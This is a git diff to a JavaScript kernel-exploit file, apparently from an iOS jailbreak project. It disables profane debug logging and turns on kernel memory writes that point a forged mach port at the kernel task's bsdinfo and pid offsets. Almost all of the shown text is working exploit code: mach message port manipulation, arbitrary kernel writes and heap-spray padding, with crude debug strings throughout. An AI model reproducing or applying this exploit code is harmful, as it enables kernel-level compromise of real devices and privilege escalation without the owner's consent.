1 files changed, 10 insertions, 9 deletions

diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index e96dea4..741f217 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -289,19 +289,19 @@ function send_ports(target, payload, num, number_port_descs) {
 
 function release_port_ptrs(port) {
 //	var req = shit_heap(0x1c + (5 * 0xc) + 0x8);
-	p0laris_log("fuck");
+//	p0laris_log("fuck");
 	var req = shit_heap(0x1c + (5 * 0xc) + 0x8);
-	p0laris_log("fuck");
+//	p0laris_log("fuck");
 	//	p0laris_log("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
 	var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
-	p0laris_log("fuck");
+//	p0laris_log("fuck");
 	if (ret != KERN_SUCCESS) {
 		p0laris_log("mach_recv %d %s\n", ret, mach_error_string(ret));
-		p0laris_log("fuck2");
+//		p0laris_log("fuck2");
 	}
-	p0laris_log("fuck");
+//	p0laris_log("fuck");
 	shit_heap_free(req);
-	p0laris_log("fuck");
+//	p0laris_log("fuck");
 }
 
 function r3gister(task, init_port_set, real_count, fake_count) {
@@ -511,15 +511,16 @@ again: while (true) {
 	p0laris_log("fuck\n");
 
 	p0laris_log("fuck\n");
+	/*
 	for (var i = 0; i < 0x78; i += 4) {
 		write_u32(kport + i, 0x41410000 | i);
 	}
 	for (var i = 0; i < 0x78; i += 4) {
 		write_u32(kport + i + 0x78, 0x41420000 | i);
-	}
-//	write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
+	}*/
+	write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
 	p0laris_log("fuck\n");
-//	write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
+	write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
 	p0laris_log("fuck\n");
 	var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
 	p0laris_log("fuck\n");